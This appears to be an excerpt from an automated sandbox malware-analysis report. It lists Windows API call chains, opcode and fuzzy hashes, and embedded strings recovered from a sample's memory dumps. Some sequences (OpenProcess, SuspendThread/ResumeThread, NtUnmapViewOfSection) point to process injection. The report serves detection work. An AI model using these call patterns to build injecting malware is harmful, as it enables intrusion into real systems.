  • GetFileSize.KERNEL32(00000000,00000000,?,?,001D6DE7,00000000,001C797E,001C797E,00000000,00000000,00000000,001C767C,001C797E,001C797E,00000000,00000000), ref: 001D6D46
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 001D6D72
  • GetLastError.KERNEL32(?,?,001D6DE7,00000000,001C797E,001C797E,00000000,00000000,00000000,001C767C,001C797E,001C797E,00000000,00000000,00000000), ref: 001D6D97
  • CloseHandle.KERNEL32(000000FF), ref: 001D6DA8
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: GetLastError$HeapFreeRtlAllocateHeapWaitForSingleObject
  • String ID:
  • API String ID: 1129198028-0
  • Opcode ID: e3a02cbeabdfe4a2cd864ccd1553d94aed3507c904c4d03dee893086ea269868
  • Instruction ID: 59916db0f0ba61348a2dee30f2c028260359dd5f044f847590a39ac0bfcd07d8
  • Opcode Fuzzy Hash: C7E05C64444FC296C00FB62559903FB5B466F41BD3D4C5623B8042404D3F4633F7296E
  • Instruction Fuzzy Hash: 59916db0f0ba61348a2dee30f2c028260359dd5f044f847590a39ac0bfcd07d8
APIs
  • RtlAllocateHeap.NTDLL(00000000,00004000), ref: 001C84BC
  • GetLastError.KERNEL32 ref: 001C84DF
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 001C84F2
  • GetLastError.KERNEL32 ref: 001C84FD
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8545
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 61
  • API ID: CreateDirectoryDeleteFileGetLastErrorHeapFreeRemoveDirectory
  • String ID:
  • API String ID: 4079355387-0
  • Opcode ID: 8c67f55a15a2c5e2e65c1e56377dd64d01b0e2d18364e0ba4940ce76a46808fc
  • Instruction ID: 065d5ed1bcaf4d35961f09f99a339e463c93b1b32b72de6584e4f84f246ea1e5
  • Opcode Fuzzy Hash: B9E0C9764404804A4CA7D8A9A86C27E458316539E2C0D4335F5793B8A7DEA129BE0F93
  • Instruction Fuzzy Hash: 065d5ed1bcaf4d35961f09f99a339e463c93b1b32b72de6584e4f84f246ea1e5
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • DeleteFileA.KERNEL32(00000000,000004D2), ref: 001C11D6
  • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 001C11DF
  • GetLastError.KERNEL32 ref: 001C11E9
    • Part of subcall function 001C1000: lstrcpy.KERNEL32(00000000,?), ref: 001C1046
    • Part of subcall function 001C1000: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C1115
    • Part of subcall function 001C1000: CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 001C1145
    • Part of subcall function 001C1000: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 001C115E
    • Part of subcall function 001C1000: CloseHandle.KERNEL32(00000000), ref: 001C1168
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,?), ref: 001C1178
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,00000000), ref: 001C1193
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,?), ref: 001C11A3
    • Part of subcall function 001C771B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001C775C
    • Part of subcall function 001C771B: lstrlen.KERNEL32(00000000,?,00000000,?,?,001C1255,00000000,00000000,00000004), ref: 001C7774
    • Part of subcall function 001C771B: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C7788
    • Part of subcall function 001C771B: mbstowcs.NTDLL ref: 001C7798
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C77B6
    • Part of subcall function 001C771B: CloseHandle.KERNEL32(?), ref: 001C77C0
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C77CF
  • RemoveDirectoryA.KERNEL32(00000000,00000000,00000000,00000000,00000004), ref: 001C125E
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C126D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 57
  • API ID: GetSystemTimeAsFileTimeHeapFreeRtlAllocateHeaplstrlenmemcpy
  • String ID:
  • API String ID: 469818408-0
  • Opcode ID: f1f47f5e13992d98d78fab90320651e280bece1f12eb0609cccb7f77c9a22763
  • Instruction ID: fa3c0d327166d11334bf8ce23e920ae80c025fb47fa31180c6216c2e2605688f
  • Opcode Fuzzy Hash: 7DE02629491513D7082B292E5858B3CE612FDF32E650C2373E6002E18B0B8233B55E6F
  • Instruction Fuzzy Hash: fa3c0d327166d11334bf8ce23e920ae80c025fb47fa31180c6216c2e2605688f
APIs
  • GetSystemTimeAsFileTime.KERNEL32(001C77AB,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BAD
  • memcpy.NTDLL(001C77AB,?,00000009,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BCF
  • RtlAllocateHeap.NTDLL(00000000,00000013), ref: 001C7BE7
  • lstrlenW.KERNEL32(00000000,00000001,001C77AB,?,?,?,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7C07
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C7C2C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 25
  • API ID: HeapFreeRtlAllocateHeapRtlEnterCriticalSectionRtlLeaveCriticalSectionmemcpy
  • String ID:
  • API String ID: 229461383-0
  • Opcode ID: bbc3c6a859906d8649009038d034178e5739454c1ef541e28150f978055748ba
  • Instruction ID: e0ce7683c07fadfa7263f2f5f0c25f91a7575de694d2a60a30204d8eded1361d
  • Opcode Fuzzy Hash: EDE06870284402D5901B6489BC4AA32FA0BFA813CADCD411BDD613924D3AC305A57B18
  • Instruction Fuzzy Hash: e0ce7683c07fadfa7263f2f5f0c25f91a7575de694d2a60a30204d8eded1361d
APIs
    • Part of subcall function 001DDA6F: lstrlen.KERNEL32(?,001EB160,001E5128,?,001DE5BF,?,00000000,001E5128,00000000,001EB16C,001EB16C,?,001DE11D,?,?,?), ref: 001DDA7B
  • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001C5BA4
  • memcpy.NTDLL(00000000,?,?), ref: 001C5BB7
  • RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C5BC8
  • RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5BDD
    • Part of subcall function 001CAE7F: lstrcmpi.KERNEL32(?,001EC4EA), ref: 001CAED6
    • Part of subcall function 001CAE7F: HeapFree.KERNEL32(00000000,00000000,001C5C01), ref: 001CAF03
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C5C15
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 218
  • API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamePathFindExtensionlstrcpy
  • String ID:
  • API String ID: 1809591024-0
  • Opcode ID: a7ba591b065612ca5392502f724a25a23db9ce2fa7cff4761a80896cec28b3f4
  • Instruction ID: 66f2c6aac88ed1bd9334c7600f51663f9dc178801934e8592d4354f33624fdca
  • Opcode Fuzzy Hash: 51D05B95471CC4D3595E459D102515290C66C6530619CF5467751397655B30305CEF6D
  • Instruction Fuzzy Hash: 66f2c6aac88ed1bd9334c7600f51663f9dc178801934e8592d4354f33624fdca
APIs
    • Part of subcall function 01B3115C: RtlAllocateHeap.NTDLL(00000000,?,01B33CA0), ref: 01B31168
  • GetCurrentThreadId.KERNEL32(?,?,?,01B34C06,?,01B374BC,00000000,01B32D09,00000750), ref: 01B34BAB
  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,01B34C06,?,01B374BC,00000000,01B32D09,00000750), ref: 01B34BB7
  • GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 01B34BC5
  • PathFindExtensionA.SHLWAPI(00000000), ref: 01B34BD9
  • lstrcpy.KERNEL32(00000000), ref: 01B34BE0
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 50
  • API ID: HeapFreeRegCloseKeyRegCreateKeyRtlAllocateHeapwsprintf
  • String ID:
  • API String ID: 3256001470-0
  • Opcode ID: 01f8e3d33e50ea4ec22d448b9311bf29d95033bd0f3209c1f4217f579a1e53db
  • Instruction ID: 0faa5e966659bbae2001dc4585f1599da78a6ae1860b80842554bcb3e2384545
  • Opcode Fuzzy Hash: 40E0C2FA0244E39A502B6469683A2B8F6197C912D640D6232F6152D609BF8332A73B1E
  • Instruction Fuzzy Hash: 0faa5e966659bbae2001dc4585f1599da78a6ae1860b80842554bcb3e2384545
APIs
  • RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 001CA760
  • wsprintfA.USER32 ref: 001CA775
  • RegCreateKeyA.ADVAPI32(80000001,001EB240,00000000), ref: 001CA78D
  • RegCloseKey.ADVAPI32(?), ref: 001CA7B5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CA7C4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 108
  • API ID: CreateEventGetCurrentProcessIdGetLastErrorGetVersionOpenProcess
  • String ID:
  • API String ID: 2618137798-0
  • Opcode ID: 1fac3af1d3adb9373cb89c72372644e4dde4d88d2c69072dbd9dfbcd659d169c
  • Instruction ID: abc2545ef0dc46afb557436b5d1827735c549071f6e9243f9dc2d7b6ad911185
  • Opcode Fuzzy Hash: 97D05E300CD904CB900F7861444435C5E49FD873C289C3A45F84020D0EEBC4E2E03F99
  • Instruction Fuzzy Hash: abc2545ef0dc46afb557436b5d1827735c549071f6e9243f9dc2d7b6ad911185
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,001C138B,?), ref: 001D81EE
  • GetVersion.KERNEL32 ref: 001D81FD
  • GetCurrentProcessId.KERNEL32 ref: 001D8214
  • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 001D8231
  • GetLastError.KERNEL32 ref: 001D8250
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 37
  • API ID: GetLastErrorGetVersion
  • String ID: GET$POST
  • API String ID: 2325875326-3192705859
  • Opcode ID: 26b0fd4c2e62fc57389cc46e4c3039c84c7b440f69484f47d42f00f4ba49821f
  • Instruction ID: 2d848e266604d7f3202df0d77fbb157f043afe7d069b6b050c1dca03819d605d
  • Opcode Fuzzy Hash: BC014CB305DC52EBD17BB6950006FB39B84DF12AF6CDC611079816A3DCBE8072355B40
  • Instruction Fuzzy Hash: 2d848e266604d7f3202df0d77fbb157f043afe7d069b6b050c1dca03819d605d
APIs
    • Part of subcall function 001D9640: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,001DE6F9,00000008,00000000,00000000,?,?,001DE988,?,?,00000001,00000000,00000000), ref: 001D9649
    • Part of subcall function 001D9640: mbstowcs.NTDLL ref: 001D9670
    • Part of subcall function 001D9640: memset.NTDLL ref: 001D9682
  • GetVersion.KERNEL32(00000008,00000000,00000000,?,?,001DE988,?,?,00000001,00000000,00000000,?,00000008,00000030), ref: 001DE705
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • GetLastError.KERNEL32(00000008,00000000,00000000,?,?,001DE988,?,?,00000001,00000000,00000000,?,00000008,00000030), ref: 001DE834
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 61
  • API ID: HeapFreeRtlAllocateHeapwsprintf
  • String ID: | "%s" | %u
  • API String ID: 2081543798-1108170107
  • Opcode ID: ae5a1f8a578234636b2fd743cdac99d3783860d35e2b0785ba9b52f3117a28dd
  • Instruction ID: 277ab281c9c0564519fca3adf21b537e1a199750048c4e81c7822df4a60b697e
  • Opcode Fuzzy Hash: 67E07DB409184355B037ACD69025B7EC3427D810CCC8C7A7AEA023520E6E03306727CD
  • Instruction Fuzzy Hash: 277ab281c9c0564519fca3adf21b537e1a199750048c4e81c7822df4a60b697e
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C14AA
    • Part of subcall function 001D8FBB: GetLocalTime.KERNEL32(?), ref: 001D8FC5
    • Part of subcall function 001D8FBB: wsprintfA.USER32 ref: 001D8FF1
  • wsprintfA.USER32 ref: 001C14CD
    • Part of subcall function 001CB83A: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,001C14F5,?,00000000,00000000,00000000,00000006), ref: 001CB858
    • Part of subcall function 001CB83A: wsprintfA.USER32 ref: 001CB876
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C14FE
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 53
  • API ID: CreateDirectoryGetTempFileNameGetTickCount
  • String ID: \Low
  • API String ID: 1806217356-4112222293
  • Opcode ID: 7a122810f4ba2df995a7e36e2785305a4afbcd989035409fc777345f7c9fec3f
  • Instruction ID: 3f130f1f3a53128e1463fee44bdfd7f990f5237a079695b12822b0c195705b07
  • Opcode Fuzzy Hash: 49D0C2B9A24C468A8D56A268450A7718F61A251BD7BCC6034D7059B882E709B9CA1F12
  • Instruction Fuzzy Hash: 3f130f1f3a53128e1463fee44bdfd7f990f5237a079695b12822b0c195705b07
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • CreateDirectoryA.KERNEL32(00000000,00000000,?,00002365,00000000,?,001D8F26,?,?,00000000,?,001C2EC9,00000000), ref: 001D7543
  • GetTickCount.KERNEL32(00000000,?,00002365,00000000,?,001D8F26,?,?,00000000,?,001C2EC9,00000000), ref: 001D754E
  • GetTempFileNameA.KERNEL32(00000000,00000000,00000000), ref: 001D755A
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: HeapFreeRtlAllocateHeapmemcpy
  • String ID: Access-Control-Allow-Origin:
  • API String ID: 1636659435-3194369251
  • Opcode ID: a76e7bf81e614bf17f8f08eebcaf72a4e27078f9184a1b73ad63f98f5b0f8fb9
  • Instruction ID: 64ccfe0c75ee596e2a3944b2012f241a37e740715042665ef384d4bace949e15
  • Opcode Fuzzy Hash: 8AD0CD20050C91CEC927315268357A5E945BF82187C4D9173DA40342670F123161699F
  • Instruction Fuzzy Hash: 64ccfe0c75ee596e2a3944b2012f241a37e740715042665ef384d4bace949e15
APIs
  • RtlAllocateHeap.NTDLL(00000000,00004000,00000008), ref: 001CA6C7
    • Part of subcall function 001DEBA9: GetLastError.KERNEL32(?,00000016,00000000,00000000,00000004,?,00000002,?,00000016,00000000,00000000,00000004,?,?,20000013,00000000), ref: 001DEC80
    • Part of subcall function 001DEBA9: GetLastError.KERNEL32 ref: 001DEC9A
  • memcpy.NTDLL(?,?,00004000,?,?,001CC686,?,?), ref: 001CA705
  • HeapFree.KERNEL32(00000000,?), ref: 001CA727
Strings
  • Access-Control-Allow-Origin:, xrefs: 001CA6B5
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: HeapFreeRtlAllocateHeaplstrlen
  • String ID: EMPTY
  • API String ID: 1247231264-2677276532
  • Opcode ID: 2051cc3ec5f54dabcc304b4f0cec6452e119b3d666e1d12c395dfd06a3d839d2
  • Instruction ID: 1768f262104d9a9ad108f4b9e5aa1de19fe749ec0873948c45898fa26152a5ef
  • Opcode Fuzzy Hash: 8DD02B3086545F8FC0275440A4383E9D84477050D9D5D1535E4402A0485B0732811FA9
  • Instruction Fuzzy Hash: 1768f262104d9a9ad108f4b9e5aa1de19fe749ec0873948c45898fa26152a5ef
APIs
  • RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C3AE8
  • lstrlen.KERNEL32(EMPTY,00000008,001EC4D7,00000000,0000010E,00000000,001C397E,?,?,001C397E), ref: 001C3B26
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL ref: 001DDEA1
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,001EC117), ref: 001DDF4F
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDFC7
    • Part of subcall function 001DDE6F: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DE039
    • Part of subcall function 001DDE6F: lstrcpy.KERNEL32(00000000,00000000), ref: 001DE061
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,?), ref: 001DE06F
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,00000000), ref: 001DE07F
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE12C
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,001EB1C0), ref: 001DE176
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DE185
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE197
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000), ref: 001DE1AD
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?), ref: 001DE1BC
  • HeapFree.KERNEL32(00000000,00000000,EMPTY), ref: 001C3B3D
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 70
  • API ID: GetModuleHandleGetTickCountwsprintf
  • String ID: {%08X-%04X-%04X-%04X-%08X%04X}
  • API String ID: 1324421646-3263720277
  • Opcode ID: d940d29fd7f5330e7f547d121f366808a2e82348162453c5dafed4dbd97d3afc
  • Instruction ID: 4c3504695b38976792c1244a97e88c4b265a3094b164f417834ae1516bbf4c5a
  • Opcode Fuzzy Hash: 0FD05E78198713E62323F4540205D39B124A4A25E348E73A5C81072598BB96B74A6B33
  • Instruction Fuzzy Hash: 4c3504695b38976792c1244a97e88c4b265a3094b164f417834ae1516bbf4c5a
APIs
Strings
  • {%08X-%04X-%04X-%04X-%08X%04X}, xrefs: 001CE3C7
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 55
  • API ID: HeapFreelstrlenmemcpy
  • String ID: Access-Control-Allow-Origin:
  • API String ID: 3630223450-3194369251
  • Opcode ID: 6d2db76437dee989d9fadb858985fbdf1fd5b378b7da2dc10109644ce662e43c
  • Instruction ID: 258d489056666574bbbe775fce556f15e393128e7745e70c480f8265f2102eec
  • Opcode Fuzzy Hash: 65311E325646C0A6DC2560A24462B54E88037129E6ECC5319E366796F70F42E34FFF1E
  • Instruction Fuzzy Hash: 258d489056666574bbbe775fce556f15e393128e7745e70c480f8265f2102eec
APIs
  • memcpy.NTDLL(?,001ECCF4,0000001A,00000000,?,00000000,001CCA48,?,00000000), ref: 001CC4DA
  • lstrlen.KERNEL32(00000008,00000000), ref: 001CC6E5
    • Part of subcall function 001C7E94: memset.NTDLL ref: 001C7ED0
    • Part of subcall function 001C7E94: HeapFree.KERNEL32(00000000,00000000), ref: 001C7EED
    • Part of subcall function 001C7E94: memcpy.NTDLL(?,?,001CC506,?,001CC506,?,?,00000000,?,00000000,001CCA48,?,00000000), ref: 001C7F0E
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
    • Part of subcall function 001CC25A: WaitForSingleObject.KERNEL32(000001F4), ref: 001CC2E0
  • HeapFree.KERNEL32(00000000,00000008,?), ref: 001CC693
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
    • Part of subcall function 001CA6B0: RtlAllocateHeap.NTDLL(00000000,00004000,00000008), ref: 001CA6C7
    • Part of subcall function 001CA6B0: memcpy.NTDLL(?,?,00004000,?,?,001CC686,?,?), ref: 001CA705
    • Part of subcall function 001CA6B0: HeapFree.KERNEL32(00000000,?), ref: 001CA727
    • Part of subcall function 001CC3FD: HeapFree.KERNEL32(00000000,00000008,00000008), ref: 001CC41E
    • Part of subcall function 001C7FA5: memmove.NTDLL(00000000,00000000,00000000,?,00000000,001CAA69,001EC504,00000000,00000000,-00000039,?,?,001CABDF,?,00000000,?), ref: 001C7FEB
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 92
  • API ID: FreeLibraryGetLastErrorlstrlenmbstowcs
  • String ID:
  • API String ID: 3965213930-0
  • Opcode ID: 33e50c761254206a7693bc56ddd8fe5740e00c9b2afd6d060e954be887c38ac1
  • Instruction ID: d34ea66cd36f06801e840848a97892b88694174aeec1fbb83900a10c6fbbc9cb
  • Opcode Fuzzy Hash: 8011594A088E90A7C53360400993BD5E156E791DD6D8E73B36AE424ADA8E41B34F6F03
  • Instruction Fuzzy Hash: d34ea66cd36f06801e840848a97892b88694174aeec1fbb83900a10c6fbbc9cb
APIs
    • Part of subcall function 001DF422: RegOpenKeyA.ADVAPI32(80000002,001E74AC,00000001), ref: 001DF43D
    • Part of subcall function 001DF422: LoadLibraryA.KERNEL32(00000000), ref: 001DF48B
    • Part of subcall function 001DF422: GetProcAddress.KERNEL32(00000000,001ED2EE), ref: 001DF49D
    • Part of subcall function 001DF422: GetLastError.KERNEL32 ref: 001DF4BC
    • Part of subcall function 001DF422: FreeLibrary.KERNEL32(00000000), ref: 001DF4CE
    • Part of subcall function 001DF422: GetLastError.KERNEL32 ref: 001DF4D6
    • Part of subcall function 001DF422: RegCloseKey.ADVAPI32(?), ref: 001DF4EE
  • lstrlen.KERNEL32(00000001,00000008,00000000), ref: 001DF618
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • mbstowcs.NTDLL ref: 001DF636
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • GetLastError.KERNEL32(?,?,00000001), ref: 001DF68B
  • FreeLibrary.KERNEL32(?,?,00000001), ref: 001DF6F3
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 388
  • API ID: ResumeThreadSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 4069891769-0
  • Opcode ID: 52d5ac88bbbf53c9cfbe25b5062edfbbaef7bf8270021e4a65f9659b5eb139f2
  • Instruction ID: cd3bb32f75bf20bf5f2e51cd674993756cd0b3fab1530bc6e4fbec9ec7105c71
  • Opcode Fuzzy Hash: 97014507296660C3D102A815855973AF583E742EBAE28E600DA81B008A4E9539F0EB6D
  • Instruction Fuzzy Hash: cd3bb32f75bf20bf5f2e51cd674993756cd0b3fab1530bc6e4fbec9ec7105c71
APIs
  • memset.NTDLL ref: 001DC240
    • Part of subcall function 001DC097: memset.NTDLL ref: 001DC0D3
  • ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 001DC2CA
  • WaitForSingleObject.KERNEL32(00000064), ref: 001DC2D8
  • SuspendThread.KERNEL32(?), ref: 001DC2EB
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: memcpy$GetSystemTimeAsFileTimelstrlen
  • String ID:
  • API String ID: 1931430322-0
  • Opcode ID: 693e72703b4a898abaf84b83207713b059777c08181f4929022bd8422aa13c29
  • Instruction ID: 1ca3f777b08589e684f93c7ca90c71ea4e5882c064f3443b4050ccbbb3e3c560
  • Opcode Fuzzy Hash: DAF08162280C9557ED332454000FF6E1756F662081E8D7733CEF3683A759115254F797
  • Instruction Fuzzy Hash: 1ca3f777b08589e684f93c7ca90c71ea4e5882c064f3443b4050ccbbb3e3c560
APIs
  • GetSystemTimeAsFileTime.KERNEL32(?,00000008,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,001DE961), ref: 001DE3C0
  • lstrlen.KERNEL32(?), ref: 001DE3F0
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memcpy.NTDLL(00000000,?,?), ref: 001DE45F
  • memcpy.NTDLL(00000008,001E53C8,00000002,00000000,?,?), ref: 001DE474
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 1
  • API ID: GetLastErrorlstrlenwsprintf
  • String ID: `
  • API String ID: 1548721612-2679148245
  • Opcode ID: 18e5c3d0780c5ef29ab920ebacb9124f422782ea1152fc1090c3465cc06238a4
  • Instruction ID: f9bb319cb5430bdb8a65939676d8d288483bd17d8fbf8dc94a6d766210595300
  • Opcode Fuzzy Hash: E2F0AC37120AC1EFD9971088541425CD202AB322F688CD7645C32392C7BC827A6FB75F
  • Instruction Fuzzy Hash: f9bb319cb5430bdb8a65939676d8d288483bd17d8fbf8dc94a6d766210595300
APIs
    • Part of subcall function 001DE2F9: lstrlen.KERNEL32(00000000,00000008,00000000,?,00000000,?,001DE901,00000000,00000000,00000004,00000000,?), ref: 001DE305
    • Part of subcall function 001DE2F9: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,001DE901,00000000,00000000,00000004,00000000,?), ref: 001DE363
    • Part of subcall function 001DE2F9: lstrcpy.KERNEL32(00000000,00000008), ref: 001DE373
    • Part of subcall function 001DE2F9: lstrcpy.KERNEL32(00000000,00000000), ref: 001DE37F
  • lstrlen.KERNEL32(?,00000000,00000000,00000004,00000000,?), ref: 001DE91A
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • wsprintfA.USER32 ref: 001DE941
    • Part of subcall function 001DE3AA: GetSystemTimeAsFileTime.KERNEL32(?,00000008,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,001DE961), ref: 001DE3C0
    • Part of subcall function 001DE3AA: lstrlen.KERNEL32(?), ref: 001DE3F0
    • Part of subcall function 001DE3AA: memcpy.NTDLL(00000000,?,?), ref: 001DE45F
    • Part of subcall function 001DE3AA: memcpy.NTDLL(00000008,001E53C8,00000002,00000000,?,?), ref: 001DE474
    • Part of subcall function 001DE6E9: GetVersion.KERNEL32(00000008,00000000,00000000,?,?,001DE988,?,?,00000001,00000000,00000000,?,00000008,00000030), ref: 001DE705
    • Part of subcall function 001DE6E9: GetLastError.KERNEL32(00000008,00000000,00000000,?,?,001DE988,?,?,00000001,00000000,00000000,?,00000008,00000030), ref: 001DE834
